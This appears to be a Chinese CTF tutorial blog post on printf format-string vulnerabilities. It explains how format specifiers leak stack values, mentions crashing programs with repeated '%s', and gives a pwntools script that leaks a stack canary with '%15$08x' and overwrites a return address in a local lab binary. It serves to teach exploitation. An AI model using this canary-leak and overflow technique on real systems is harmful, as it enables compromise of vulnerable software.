【Pwn】printf漏洞

参考:https://bbs.pediy.com/thread-250858.htm

目录

Format String 介绍

格式化字符串漏洞

例1:

例2:

例3:


Format String 介绍

1

printf("Team Name: %s\tPoints: %d\n", "Whitzard", 999);

在上面这行语句中, "Team Name: %s\tPoints: %d\n"为格式化字符串(即printf第一个参数),"Whitzard"、999分别为第二个和第三个参数。在格式化字符串解析时,格式化字符串中的 "%s" 对应到第二个参数 "Whitzard" ,而 "%d" 则对应到第三个参数999。

Format String符号说明

在格式化字符串中,"%s"、"%d" 等类型的符号叫符号说明。

%3$s:第三个参数(从栈顶往下数第4(1+3)个参数)

格式化字符串漏洞

printf函数在执行时,首先进行格式化字符串的解析——从栈(或者寄存器)获取参数并与符号说明进行匹配,然后将匹配的结果输出到屏幕上。如果格式化字符串中的符号声明与栈上参数不能正确匹配,比如参数个数少于符号声明个数时,即有更多的符号说明需要被匹配时,printf会根据解析结果和调用约定去取栈上(reg)相应的值并输出,就有可能造成泄露。

TIPS

参数放在栈上时要保证对齐,保证输入的地址的完整可用性,32位以四字节对齐,64位以八字节对齐,payload在构造时需要精心设计;

如果'%s'解析到了一个不合理的或者不可访问的地址时,程序就会崩溃,由此也能衍生出一种构造多个'%s'让程序崩溃的攻击方式。

例1:

执行到printf函数执行之前

 经验证可知vararg的值应该来自于0xffffd4b0-4,也就是0xffffd4b4

如果不做任何操作,执行printf函数时会报错

尝试改变0xffffd4b4处的值为“lingqi”

 继续执行,成功输出

例2:

 运行,输入lingqi

若添加一些符号说明

可见,若输入某种特殊字符,系统会识别并去栈上匹配并输出

例3:

思路:有两个read函数与一个printf函数,可利用第一个read函数和printf函数泄露canary地址,利用第二个read函数send payload。

1.(在gdb中)disass func

观察到 ebp-0xc 为canary的地址

2.查看canary的值:x $ebp-0xc

3.在printf处下断点,运行到printf执行之前。

查看栈:stack 0x28

 可见canary距栈顶有15行(canary那行不算)

4.尝试输出canary:

重新运行:r

用到%K$p:输入%15$08x:偏移量为15,输出8位,回车

n,回车

成功打印出canary

5.写payload

查看输入%15$08x之后的栈

思路:payload = 输入的字符串(d5cc)距canary(d5ec)的距离 + canary + canary(d5ec)到返回地址(d5fc)的距离 + exploit函数返回地址

from pwn import *

p = process("./printf3")

p.sendline("%15$08x")        //利用第一个read函数,发送%15$08x,以获取canary

canary = p.recv()[:8]        //获取canary。[:8]:只要8位,吃掉默认的回车
print(canary)
canary = canary.decode("hex")[::-1]        //[::-1]:canary倒叙

str_canary = 4*8        //输入的字符串(d5cc)距canary(d5ec)的距离

canary_ret = 3*4        //canary(d5ec)到返回地址(d5fc)的距离

exploit_add = p32(0x080491f6)        //exploit函数返回地址,利用disass exploit查看

payload = str_canary*'a' + canary + canary_ret*'a' + exploit_add

p.sendline(payload)

p.interactive()

  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值